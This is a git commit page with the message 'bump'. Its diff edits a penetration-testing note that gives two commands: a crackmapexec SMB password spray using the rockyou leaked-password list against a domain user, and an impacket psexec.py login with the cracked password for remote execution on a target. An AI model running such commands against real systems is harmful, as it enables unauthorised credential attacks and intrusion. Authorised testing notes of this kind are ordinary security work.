bump
This commit is contained in:
parent
0327cf3f88
commit
c0d1f66adb
|
@ -4,7 +4,7 @@
|
|||
```sh
|
||||
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
|
||||
```
|
||||
* Use the password with `impacket/examples/psexec.py` in the following way
|
||||
```sh
|
||||
psexec.py domain.name/<user>:<password>@<target-IP>
|
||||
```
|
||||
* Use the password with `impacket/examples/psexec.py` in the following way
|
||||
```sh
|
||||
psexec.py domain.name/<user>:<password>@<target-IP>
|
||||
```
|
||||
|
|
Loading…
Reference in New Issue